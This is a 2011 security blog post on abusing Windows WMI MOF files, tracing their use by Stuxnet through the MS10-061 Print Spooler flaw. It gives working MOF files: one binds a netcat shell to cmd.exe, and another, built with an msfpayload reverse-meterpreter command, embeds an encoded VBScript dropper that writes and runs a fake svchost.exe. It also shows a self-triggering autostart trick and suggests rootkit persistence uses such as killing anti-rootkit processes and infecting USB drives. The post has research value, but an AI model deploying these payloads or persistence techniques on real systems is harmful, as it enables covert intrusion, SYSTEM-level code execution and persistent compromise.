Pop Pop Ret: Playing with MOF files on Windows, for fun & profit

dimanche 18 septembre 2011

Playing with MOF files on Windows, for fun & profit

In this article, we will focus on a high-level Windows feature that is not so well-known, and that can be interesting from an attacker's point of view. I will share my investigation of MOF files from its use in Stuxnet - in the exploitation of a vulnerability in the Windows Printer Spooler - to some basic practical examples of what we can do with MOF files.

1. Stuxnet and the Windows Printer Spooler vulnerability (MS10-061)

The Stuxnet Worm embedded 4 different 0-days, an overall analysis is given by Symantec in [1] . Stuxnet has already been discussed a lot, and there have been many good papers out there about the different vulnerabilities that are exploited. In particular, the paper [2] published in MISC magazine (french) gives a good overview of the vulnerability MS10-061 in Windows Printer Spooler.

Basically, this vulnerability permits to remotely execute code with SYSTEM privilege on a Windows XP machine if a printer is shared on the network. It was patched by Microsoft on September 2010 [3]. The other versions of Windows are vulnerable, but only when really particular conditions are met, as it is well sum up in [4] with the following figure:

Actually, when a printer is shared on the network on Windows XP, it's reachable by anybody as the Guest user in order to print documents. The "printer spooler service" which is locally responsible for handling the requests from the client is the spoolsv.exe process. It's possible to remotely talk with it by using the RPC protocol (Remote Procedure Call). Stuxnet simply uses the methods implemented by the service to ask it to write a file on the disk of the machine.

The article [2] explains in detail that it is possible to specify a destination path where to write the file by using the call to the API StartDocPrinter, which notifies the spooler that a new job arrived. In Stuxnet, the goal was to execute the payload after uploading it to a file on the remote machine. The authors actually used the Windows feature called WMI (Windows Management Instrumentation). So, we'll investigate this technology and we'll see some interesting subtleties.

2. Windows Management Instrumentation (WMI)

Before practicing, we need to know a bit of theory about WMI. So I'll try to sum up my researches about this Windows feature, and give the concepts that are useful before beginning to play with it.

According to [5], we learn that:
“WMI is an implementation of Web-Based Enterprise Management (WBEM) […]. The WBEM standard encompasses the design of an extensible enterprise data-collection and data-management facility that has the flexibility and extensibility required to manage local and remote systems that comprise arbitrary components”. “WMI consists of four main components: management applications, WMI infrastructure, providers, and managed objects (system, disks, processes, network components…)”. The following figure gives an overview of the architecture of WMI.

To sum up, it is an information exchange standard interface based on a client/server model:

... Well, the architecture is rather complex, let's try to dig into it...
First, at the center of the WMI architecture, we have the WMI Infrastructure which is composed of the CIMOM (Common Information Model Object Manager). It binds management applications - also called "consumers" - on the one hand and "providers" on the other hand. This object manager is also in relation with a repository (CIM/WMI repository) that stores CIM classes' definitions.

CIM classes are hierarchically organized with subclasses that inherit from their parent class. CIM classes are grouped in namespaces, which are just logical group of classes. For example, the namespace root\cimv2 includes most of the classes that represent computer's resources. The language used to describe CIM classes is called MOF (Managed Object Format).

What is really interesting with WMI is that it permits to execute some code when the notification of an event occurs. The event might be a program start, an user authentication, ... or any other Windows event. A MOF file needs to be registered into the CIM/WMI repository in order to be taken into account by WMI. When registering a MOF file, the CIM class(es) it describes are indeed added into the repository.

Let's see the classes that are interesting:
  • __EventFilter [6] [7]: permits to define a Windows event,
  • __EventConsumer [8]: defines a consumer. This class is actually an abstract class with several implementations. The most interesting one is ActiveScriptEventConsumer [9] because it makes possible to embed VBScript or JSScript in the consumer. Note that it is only available in the namespace root\subscription.
    The cool thing is that the consumer runs with SYSTEM privilege on Windows XP and Windows 2003 Server. Under Vista, it is running under the LOCAL_SERVICE user. I haven't tried under Windows 7, maybe someone ? =)
  • __FilterToConsumerBinding [10]: it is used to link the two other instances. In other words, it permits to activate the consumer - and to execute its code - whenever the defined event occurs.

      As we learn in [11], MOF files are compiled into the WMI repository using mofcomp.exe. Moreover, a MOF file that is put in the %SystemRoot%\System32\wbem\mof\ directory is automatically compiled and registered into the WMI repository. It is defined in the registry key HKLM\SOFTWARE\Microsoft\WBEM\CIMOM\ as we can see in here:

      Note: @jduck1337 made me noticed that MOF files aren't autocompiled on Vista +

      The file mofcomp.log located in %SystemRoot%\System32\wbem\mof\Logs\ contains the logs about MOF files compilations, as shown in the following screenshot:

      This auto-compilation feature was used by Stuxnet: 2 files were uploaded on the targeted remote machine using MS10-061:
      • %SystemRoot%\System32\winsta.exe: Stuxnet’s main module
      • %SystemRoot%\System32\wbem\mof\sysnullevnt.mof: MOF file that will automatically compile itself and that contains the code needed to execute the winsta.exe file when some events occur.

      Now, let's see MOF files in action with 3 fictive examples.

      3. A basic example of MOF file

      Let's see a first basic example of MOF file: let's imagine that we want to launch an executable when some events occur on the system. For illustration purpose, we'll launch the executable (here, Netcat for Windows) when a new log entry is added.

      So, we create a correct MOF file with a consumer (instance of ActiveScriptEventConsumer) that executes a VBScript. This VBScript will just create a Shell object and execute netcat with the right parameters. We'll also define an event filter by instantiating the __EventFilter class, in order to define when the consumer will be executed. For the example, we'll notify the consumer from the event filter when a new entry is added in "Application" Logs.

      Event filters must use a SQL-like language called WQL (WMI Query Language) to define the Windows event(s) that will spark the execution of the consumer [12].

      Here is what looks like our first MOF file:
      #pragma namespace ("\\\\.\\root\\subscription")
      instance of __EventFilter as $FILTER
          Name = "CLASS_FIRST_TEST";
          EventNamespace = "root\\cimv2";
       Query = "SELECT * FROM __InstanceCreationEvent "
        "WHERE TargetInstance ISA \"Win32_NTLogEvent\" AND "
          QueryLanguage = "WQL";
      instance of ActiveScriptEventConsumer as $CONSUMER
          Name = "CLASS_FIRST_TEST";
          ScriptingEngine = "VBScript";
          ScriptText =
            "Set objShell = CreateObject(\"WScript.Shell\")\n"
         "objShell.Run \"C:\\Windows\\system32\\cmd.exe /C C:\\nc.exe 1337 -e C:\\Windows\\system32\\cmd.exe\"\n";
      instance of __FilterToConsumerBinding
          Consumer = $CONSUMER ;
          Filter = $FILTER ;

      The example of use with netcat is taken from [15].

      Maybe, some explanations are needed:
      • Firstly, the event filter defines the WQL query corresponding to the filter. Once again, I've referred to the MSDN to build the query. In WMI, a Windows event is represented using the abstract class __Event, which has many different subclasses. Here we use __InstanceCreationEvent [13].
      • Secondly, in the consumer we must specify in  ScriptingEngine that we want to use VBScript, and then, we just have to pass our script in ScriptText.

      • Thirdly, we bind the filter and the consumer.

      Okay, so in order to check our newly created MOF file, we just put it in the directory %SystemRoot%\System32\wbem\mof\. The instances are added into the repository. And we can confirm that if we add a new log entry - here, coming from a wrong login attempt on MS SQL - the executable nc.exe is started. It runs with SYSTEM privilege, because I'm doing my tests on a Windows 2003 Server SP2:

      It looks interesting, but that would be great to embed directly a payload into the MOF file. Let's see how to do this =)

      4. Embed a payload into a MOF file

      We have already seen that it's possible to put VBscript into an instance of ActiveScriptEventConsumer. So, we can directly put our payload encoded in VBScript !
      For example, it is possible to use msfencode with the option -t vbs in order to encode a shellcode in VBScript. Let's assume that we want to embed a reverse_tcp meterpreter (fictive example) into a MOF file, we can use the following command:

      msfpayload windows/meterpreter/reverse_tcp LHOST=<ip> R | msfencode 
      -e generic/none -t vbs

      And then, we just need to put the generated VBScript into our MOF file (note that it's necessary to escape all the quotes):

      #pragma namespace ("\\\\.\\root\\subscription")
      instance of __EventFilter as $FILTER
          Name = "XPLOIT_TEST_SYSTEM";
          EventNamespace = "root\\cimv2";
          Query = "SELECT * FROM __InstanceCreationEvent "
        "WHERE TargetInstance ISA \"Win32_NTLogEvent\" AND "
          QueryLanguage = "WQL";
      instance of ActiveScriptEventConsumer as $CONSUMER
          Name = "XPLOIT_TEST_SYSTEM";
          ScriptingEngine = "VBScript";
          ScriptText = "Function jcmNPtWMUEOI() \n"
      "vURTl=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(184)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(232)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&Chr(31)&Chr(186)&Chr(14)&Chr(0)&Chr(180)&Chr(9)&Chr(205)&Chr(33)&Chr(184)&Chr(1)&Chr(76)&Chr(205)&Chr(33)&Chr(84)&Chr(104)&Chr(105)&Chr(115)&Chr(32)&Chr(112)&Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(32)&Chr(99)&Chr(97)&Chr(110)&Chr(110)&Chr(111)&Chr(116)&Chr(32)&Chr(98)&Chr(101) \n"
      // [...]
      "vURTl=vURTl&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(96)&Chr(46)&Chr(114)&Chr(100)&Chr(97)&Chr(116)&Chr(97)&Chr(0)&Chr(0)&Chr(230)&Chr(15)&Chr(0)&Chr(0)&Chr(0)&Chr(192)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(192)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(64)&Chr(46)&Chr(100)&Chr(97)&Chr(116)&Chr(97)&Chr(0)&Chr(0)&Chr(0)&Chr(92)&Chr(112)&Chr(0)&Chr(0)&Chr(0)&Chr(208)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(208)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(192) \n" 
      "Dim eXmdsyLFEs \n"
      "Set eXmdsyLFEs = CreateObject(\"Scripting.FileSystemObject\") \n"
      "Dim TxNAbBlYJ \n"
      "Dim OnzEldZtxrMeY \n"
      "Dim YzlWLAgbdcsRP \n"
      "Dim gpvFZLaXwIZzKCJ \n"
      "Set OnzEldZtxrMeY = eXmdsyLFEs.GetSpecialFolder(2) \n"
      "gpvFZLaXwIZzKCJ = OnzEldZtxrMeY & \"\\\" & eXmdsyLFEs.GetTempName() \n"
      "eXmdsyLFEs.CreateFolder(gpvFZLaXwIZzKCJ) \n"
      "YzlWLAgbdcsRP = gpvFZLaXwIZzKCJ & \"\\\" & \"svchost.exe\" \n"
      "Set TxNAbBlYJ = eXmdsyLFEs.CreateTextFile(YzlWLAgbdcsRP,2,0) \n"
      "TxNAbBlYJ.Write vURTl \n"
      "TxNAbBlYJ.Close \n"
      "Dim VvLFolkbOsQvlf \n"
      "Set VvLFolkbOsQvlf = CreateObject(\"Wscript.Shell\") \n"
      "VvLFolkbOsQvlf.run YzlWLAgbdcsRP, 0, true \n"
      "eXmdsyLFEs.DeleteFile(YzlWLAgbdcsRP) \n"
      "eXmdsyLFEs.DeleteFolder(gpvFZLaXwIZzKCJ) \n"
      "End Function \n"
      "jcmNPtWMUEOI \n";        
      instance of __FilterToConsumerBinding
          Consumer = $CONSUMER ;
          Filter = $FILTER ;

      We can actually put any executable into a MOF file thanks to the possibility to use VBScript.

      In some circumstances, we might have a problem with the previous MOF files because the consumer isn't automatically started after its registration into the WMI repository. We'll now see a trick that can be used to overcome this.

      5. Consumer autostart after MOF file registration

      If we dig into the MSDN, we can see that the __InstanceCreationEvent class, that we have used so far in the WQL query, can be actually used to filter on the instantiation of a new class into the WMI repository. The name of the class in question must be given to TargetInstance.__class.
      So, it is possible to use this feature to trigger the autostart of the consumer. Let's see what looks like the new version of our MOF file:

      #pragma namespace ("\\\\.\\root\\subscription")
      class WoootClass 
       string Name;
      instance of __EventFilter as $FILTER
          Name = "XPLOIT_TEST_SYSTEM";
          EventNamespace = "root\\subscription";
       Query = "SELECT * FROM __InstanceCreationEvent "
               "WHERE TargetInstance.__class = \"WoootClass\"";
          QueryLanguage = "WQL";
      instance of ActiveScriptEventConsumer as $CONSUMER
          Name = "XPLOIT_TEST_SYSTEM";
          ScriptingEngine = "VBScript";
          ScriptText = "Function jcmNPtWMUEOI() \n"
      "vURTl=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(184)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(232)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&Chr(31)&Chr(186)&Chr(14)&Chr(0)&Chr(180)&Chr(9)&Chr(205)&Chr(33)&Chr(184)&Chr(1)&Chr(76)&Chr(205)&Chr(33)&Chr(84)&Chr(104)&Chr(105)&Chr(115)&Chr(32)&Chr(112)&Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(32)&Chr(99)&Chr(97)&Chr(110)&Chr(110)&Chr(111)&Chr(116)&Chr(32)&Chr(98)&Chr(101) \n"
      // [...]
      "vURTl=vURTl&Chr(98)&Chr(0) \n"
      "Dim eXmdsyLFEs \n"
      "Set eXmdsyLFEs = CreateObject(\"Scripting.FileSystemObject\") \n"
      "Dim TxNAbBlYJ \n"
      "Dim OnzEldZtxrMeY \n"
      "Dim YzlWLAgbdcsRP \n"
      "Dim gpvFZLaXwIZzKCJ \n"
      "Set OnzEldZtxrMeY = eXmdsyLFEs.GetSpecialFolder(2) \n"
      "gpvFZLaXwIZzKCJ = OnzEldZtxrMeY & \"\\\" & eXmdsyLFEs.GetTempName() \n"
      "eXmdsyLFEs.CreateFolder(gpvFZLaXwIZzKCJ) \n"
      "YzlWLAgbdcsRP = gpvFZLaXwIZzKCJ & \"\\\" & \"svchost.exe\" \n"
      "Set TxNAbBlYJ = eXmdsyLFEs.CreateTextFile(YzlWLAgbdcsRP,2,0) \n"
      "TxNAbBlYJ.Write vURTl \n"
      "TxNAbBlYJ.Close \n"
      "Dim VvLFolkbOsQvlf \n"
      "Set VvLFolkbOsQvlf = CreateObject(\"Wscript.Shell\") \n"
      "VvLFolkbOsQvlf.run YzlWLAgbdcsRP, 0, true \n"
      "eXmdsyLFEs.DeleteFile(YzlWLAgbdcsRP) \n"
      "eXmdsyLFEs.DeleteFolder(gpvFZLaXwIZzKCJ) \n"
      "End Function \n"
      "jcmNPtWMUEOI \n";        
      instance of __FilterToConsumerBinding
          Consumer = $CONSUMER ;
          Filter = $FILTER ;
      instance of WoootClass
       Name = "Woot";

      As you can see, I have just added a new class called "WoootClass" at the beginning of the MOF file. This class actually does nothing, but it is instantiated. So after the registration into the WMI repository, this instantiation will automatically trigger the filter, which will in turn trigger the consumer containing our payload !

      Therefore, this trick permits to automatically run the consumer. It can be very useful in some situation when we don't want to wait for any Windows event.

      6. Interest

      It is important to remember that the MOF self-install directory is of course only writeable by an Administrator. That's why, MOF files are really interesting in two kinds of situations:
      1. When we are able to upload a file to a remote machine, into an arbitrary destination path (with Administrator privileges in order to be able to write into the MOF self-install directory). This is the example of MS10-061 with StartDocPrinter API.

      2. In a post-exploitation context, when we have already escalated our privileges to Administrator on a Windows machine. 

      The first situation is of course relatively rare. Nevertheless, it's interesting to notice that Metasploit provides a function generate_mof() in the file lib/msf/core/exploit/wbemexec.rb. This function uses the trick described in this article to autostart the consumer. For example, it is used by the exploit of MS10-061: exploits/windows/smb/ms10_061_spoolss [13].

      The psexec module (modules/exploits/windows/smb/psexec) also uses it when MOF_UPLOAD_METHOD is selected, as we can see it the following code snippet:
      if datastore['MOF_UPLOAD_METHOD']
         # payload as exe
         print_status("Trying wbemexec...")
         print_status("Uploading Payload...")
         if datastore['SHARE'] != 'ADMIN$'
          print_error('Wbem will only work with ADMIN$ share')
         filename = rand_text_alpha(8) + ".exe"
         exe = generate_payload_exe
         fd = smb_open("\\system32\\#{filename}", 'rwct')
         fd << exe
         print_status("Created %SystemRoot%\\system32\\#{filename}")
         # mof to cause execution of above
         mofname = rand_text_alphanumeric(14) + ".MOF"
         mof = generate_mof(mofname, filename)
         print_status("Uploading MOF...")
         fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
         fd << mof
         print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
         # Disconnect from the ADMIN$

      In a post-exploitation context, I think that MOF files can provide an original way to hide malicious code into the WMI repository. The possibilities are almost infinite because we can basically say: "When _this_ event occurs, just do _that_ !". So, we can for example use MOF files with a backdoor or a rootkit in order to:

      • Automatically kill some processes as soon as they are launched (anti-rootkits...),
      • Automatically detect when the backdoor/rootkit has been deleted to load it again (dropper),
      • Automatically infect USB devices
      • ...
      What is interesting here is that it shows how high level features provided by the System can be abused by an attacker. Classes hidden into WMI repository are not likely to be quickly detected because this technology is not so well-known by users and it is rarely checked.

      However, it is still possible to detect malicious classes with a tool like WMI Object Browser from WMI Administrative Tools [14] that permits to explore the repository:

      Of course, giving class names that look apparently legitimate are likely to trick some curious users =)


      [1] W32.Stuxnet Dossier, by Symantec

      [2] MS10-061 vulnerability in Windows Printer Spooler, MISC Magazine issue #53 (french), by ivanlef0u

      [3] Microsoft Security Bulletin MS10-061

      [4] MS10-061: Printer Spooler vulnerability

      [5] Windows Internals, book by Mark Russinovich & David Salomon

      [6] __EventFilter class, MSDN

      [7] Creating an Event Filter, MSDN

      [8] ActiveScriptEventConsumer class, MSDN

      [9] __EventConsumer class, MSDN

      [10] __FilterToConsumerBinding class, MSDN

      [11] Managed Object Format (MOF), MSDN

      [12] Querying with WQL (SQL for WMI), MSDN

      [13] exploits/windows/smb/ms10_061_spoolss code, Metasploit Framework

      [14] WMI Administrative Tools, Microsoft

      [15] Newsletter HSC #77, Article about MOF/WMI (french), by Stephane Milani (sorry for forgetting)

      Greetz to
      @Heurs for the idea to dig into MS10-061 =)